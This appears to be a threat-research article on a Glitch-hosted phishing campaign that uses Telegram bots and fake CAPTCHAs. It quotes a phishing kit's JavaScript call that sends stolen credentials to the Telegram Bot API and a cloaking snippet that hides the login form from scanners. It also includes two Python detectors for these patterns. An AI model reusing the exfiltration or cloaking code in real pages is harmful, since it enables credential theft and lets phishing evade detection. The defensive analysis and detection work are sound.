Glitch-Hosted Phishing Campaign Hits 830 Organizations Using Telegram and Fake CAPTCHAs

Netskope Threat Labs tracked an alarming surge in phishing activity leveraging the Glitch web app platform. Attackers exploited Glitch’s free hosting and instant deployment features to launch hundreds of unique phishing sites, targeting over 830 organizations and compromising data from more than 3,000 individuals.

Navy Federal Credit Union (NFCU) members were singled out, but victims also included customers of T-Mobile, various banks, and corporate email services.

Traffic to these malicious Glitch-hosted sites tripled (increased 3.32x) during the four-month window, revealing both the scale and sophistication of the campaigns.

Telegram Exfiltration and CAPTCHA Evasion

The attackers’ success rests on two core techniques: the use of Telegram for real-time exfiltration of sensitive data including one-time passwords (OTPs) and the deployment of custom-built fake CAPTCHA barriers to thwart automated detection.

Abuse of Glitch Features for Stealth Hosting

Glitch offers frictionless web app development. Attackers take advantage of these features:

  • Instant, Unique Subdomains: Each project is instantly live at a URL of the form projectname-projectname-projectname.glitch[.]me
  • 24/7 Static Site Hosting: Static phishing sites don’t incur project-hour charges, staying online indefinitely.
  • Rapid Cloning via “Remix”: Attackers quickly duplicate and spawn new phishing variants, each on a fresh subdomain.

[Image: Fake CAPTCHA]

Telegram: Real-Time Data Exfiltration and MFA Bypass

Almost half the phishing kits used Telegram’s Bot API to exfiltrate credentials and OTPs. Here is a typical data-theft flow:

  1. Credential Harvesting: Victims log in to a fake NFCU site. Credentials are captured with JavaScript and sent to the attacker’s Telegram bot:

     // Kit-side exfiltration call; <botToken> and <attackerChatID> are the values configured in the kit
     fetch('https://api.telegram.org/bot<botToken>/sendMessage', {
       method: 'POST',
       body: JSON.stringify({
         chat_id: '<attackerChatID>',
         text: 'User: ' + username + ' Pass: ' + password
       }),
       headers: { 'Content-Type': 'application/json' }
     });

  2. OTP Interception: When prompted for an OTP, the user’s input is immediately relayed over Telegram, allowing attackers to bypass multi-factor authentication (MFA) almost instantly.
  3. Location and Device Fingerprinting: Scripts use services such as ipify and ipinfo.io to silently collect the victim’s IP address, city, and country, which are also sent to the attackers via Telegram.
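The three-step flow above leaves a distinctive trace in web proxy logs: a browser session that loads a Glitch subdomain, queries an IP-lookup service, and then POSTs to the Telegram Bot API. The following detector, added here as an illustration and not taken from the Netskope report or any vendor tool, parses constructed proxy log lines (timestamp, client IP, method, URL, status), tags each event, redacts the bot token before it reaches a report, and correlates per client so that a Glitch page load followed by a Bot API call is surfaced as one finding. The log format, host list (api.ipify.org, ipinfo.io) and sample tokens are assumptions for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample proxy log (not real traffic). Format assumed for this example:
# "<timestamp> <client_ip> <method> <url> <status>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 GET https://secure-access-portal.glitch.me/ 200
2024-05-01T10:00:03Z 10.0.0.5 GET https://api.ipify.org/?format=json 200
2024-05-01T10:00:04Z 10.0.0.5 GET https://ipinfo.io/json 200
2024-05-01T10:00:09Z 10.0.0.5 POST https://api.telegram.org/bot123456789:AAExampleTokenValue/sendMessage 200
2024-05-01T10:02:11Z 10.0.0.7 GET https://www.example.com/ 200
2024-05-01T10:03:00Z 10.0.0.9 GET https://api.telegram.org/bot987654321:AAAnotherToken/getMe 200
"""

# Project subdomains on glitch.me (the root domain itself is not flagged).
GLITCH_HOST = re.compile(r"^[a-z0-9-]+\.glitch\.me$")
# Telegram Bot API paths look like /bot<bot_id>:<secret>/<method>.
TELEGRAM_BOT_PATH = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)")
# IP/geolocation lookup hosts named in the article (assumed endpoints).
FINGERPRINT_HOSTS = {"api.ipify.org", "ipinfo.io"}


def redact_token(token: str) -> str:
    """Keep the numeric bot id (useful when reporting abuse to Telegram), drop the secret."""
    bot_id = token.split(":", 1)[0]
    return f"{bot_id}:<redacted>"


def parse_line(line: str) -> Dict[str, str]:
    """Split one proxy log line into its fields; host is normalised to lowercase by urlsplit."""
    ts, client, method, url, status = line.split()
    parts = urlsplit(url)
    return {"ts": ts, "client": client, "method": method,
            "host": parts.hostname or "", "path": parts.path, "status": status}


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the detection tags that apply to a single log entry."""
    tags: List[str] = []
    if GLITCH_HOST.match(entry["host"]):
        tags.append("glitch-hosted-page")
    if entry["host"] in FINGERPRINT_HOSTS:
        tags.append("ip-fingerprint-lookup")
    if entry["host"] == "api.telegram.org":
        m = TELEGRAM_BOT_PATH.match(entry["path"])
        if m:  # browsers have no legitimate reason to call the Bot API directly
            tags.append("telegram-bot-api:" + m.group("method"))
    return tags


def detect(log_text: str) -> List[Dict[str, str]]:
    """Tag every suspicious event and add a per-client correlation finding."""
    findings: List[Dict[str, str]] = []
    per_client: Dict[str, set] = defaultdict(set)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        entry = parse_line(raw)
        for tag in classify(entry):
            detail = entry["host"] + entry["path"]
            if tag.startswith("telegram-bot-api"):
                m = TELEGRAM_BOT_PATH.match(entry["path"])
                # Never write the live bot token into alerts or tickets.
                detail = f"{entry['host']}/bot{redact_token(m.group('token'))}/{m.group('method')}"
            findings.append({"ts": entry["ts"], "client": entry["client"], "tag": tag, "detail": detail})
            per_client[entry["client"]].add(tag.split(":")[0])
    # A client that loaded a Glitch-hosted page and then called the Bot API matches the kit
    # behaviour far more specifically than either event on its own.
    for client, tags in per_client.items():
        if {"glitch-hosted-page", "telegram-bot-api"} <= tags:
            findings.append({"ts": "", "client": client, "tag": "likely-phishing-kit-session",
                             "detail": ", ".join(sorted(tags))})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['client']:10} {f['tag']:32} {f['detail']}")
```

In the sample, client 10.0.0.5 produces the full chain and is promoted to a session-level finding, while 10.0.0.9 is flagged only for the isolated Bot API call; the token secret never appears in the output.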

Fake CAPTCHA: Cloaking and User Deception

To evade security scanners, some phishing kits hide credential forms behind a fake CAPTCHA, a common evasion tactic that is growing in popularity:

  • Visual Deception: Victims are greeted with a checkbox (“bot-check”). Once clicked, JavaScript replaces it with a spinner, simulating a loading CAPTCHA.
  • Payload Delivery: Only after this “test” does the phishing page reveal itself, tricking users and hiding malicious content from automated web crawlers.

Example snippet:

document.getElementById('captcha').addEventListener('change', function() {
  this.style.display = 'none';
  document.getElementById('loader').style.display = 'block';
  setTimeout(function() {
    window.location.href = '/login.html'; // Redirect to phishing payload
  }, 1500);
});
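Because the credential form only appears after the checkbox click and timed redirect, a scanner that fetches the landing page once sees nothing but a checkbox. The heuristic below, added as an illustrative example and not a tool from the report, scores a page's source for the cloaking pattern shown in the snippet above (checkbox gate, element hidden on change, setTimeout-driven redirect, no password field on the landing page) and extracts the redirect target so a crawler can queue the post-CAPTCHA page for a second look. The two HTML documents are constructed for the example; the thresholds are assumptions.

```python
import re
from typing import Dict, List

# Constructed landing page modelled on the article's cloaking snippet (not a real kit sample).
CLOAKED_LANDING = """
<html><body>
<input type="checkbox" id="captcha"> I am not a robot
<div id="loader" style="display:none">Verifying...</div>
<script>
document.getElementById('captcha').addEventListener('change', function() {
  this.style.display = 'none';
  document.getElementById('loader').style.display = 'block';
  setTimeout(function() { window.location.href = '/login.html'; }, 1500);
});
</script>
</body></html>
"""

# Constructed ordinary login page for comparison.
BENIGN_LOGIN = """
<html><body>
<form action="/session" method="post">
<input type="text" name="user"><input type="password" name="pass">
<button>Sign in</button>
</form>
</body></html>
"""

CHECKBOX = re.compile(r"<input[^>]*type=[\"']?checkbox")
PASSWORD_FIELD = re.compile(r"<input[^>]*type=[\"']?password")
# setTimeout(...) whose callback assigns location / location.href within 200 chars.
TIMED_REDIRECT = re.compile(r"settimeout\s*\([\s\S]{0,200}?location(?:\.href)?\s*=")
# A 'change' handler that hides an element, i.e. the checkbox swapped for a spinner.
HIDE_ON_CHANGE = re.compile(r"addeventlistener\(\s*['\"]change['\"][\s\S]{0,200}?display\s*=\s*['\"]none")
REDIRECT_TARGET = re.compile(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]")


def cloaking_indicators(html: str) -> Dict[str, bool]:
    """Evaluate each heuristic on the lowercased page source."""
    lower = html.lower()
    return {
        "checkbox_gate": bool(CHECKBOX.search(lower)),
        "hides_element_on_change": bool(HIDE_ON_CHANGE.search(lower)),
        "timed_redirect": bool(TIMED_REDIRECT.search(lower)),
        "no_password_field_on_landing": not PASSWORD_FIELD.search(lower),
    }


def cloaking_score(html: str) -> int:
    """Number of indicators present (0..4)."""
    return sum(cloaking_indicators(html).values())


def is_cloaked_landing(html: str, threshold: int = 3) -> bool:
    """Assumed threshold: three of four indicators marks the page for follow-up crawling."""
    return cloaking_score(html) >= threshold


def follow_up_paths(html: str) -> List[str]:
    """Redirect targets a scanner should fetch next, since the real form lives there."""
    return REDIRECT_TARGET.findall(html)


if __name__ == "__main__":
    for name, page in (("cloaked", CLOAKED_LANDING), ("benign", BENIGN_LOGIN)):
        print(name, cloaking_indicators(page), is_cloaked_landing(page), follow_up_paths(page))
```

The score deliberately treats the absence of a password field as a signal rather than as proof of safety: the cloaked page looks harmless precisely because its payload is one redirect away.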

Impact and Ongoing Research

Netskope’s analysis confirms that these techniques have enabled attackers to successfully bypass MFA, harvest thousands of credentials, and evade static scanning tools. Beyond NFCU, T-Mobile, and banking targets, the method is adaptable, posing a broad threat across sectors.

Security professionals are urged to block access to suspicious Glitch subdomains and monitor for Telegram-based exfiltration attempts.

Netskope and the broader cybersecurity community continue to track these developments, emphasizing the importance of employee phishing awareness and technical protections like domain allowlists and robust web filtering.

The Glitch-hosted, Telegram-backed campaigns represent a new wave of easily scalable, technically adept phishing operations.

As attackers innovate with platform abuse and evasion, defenders must keep pace, combining user education, detection of suspicious web domains, and monitoring for novel exfiltration channels like Telegram.

Priya
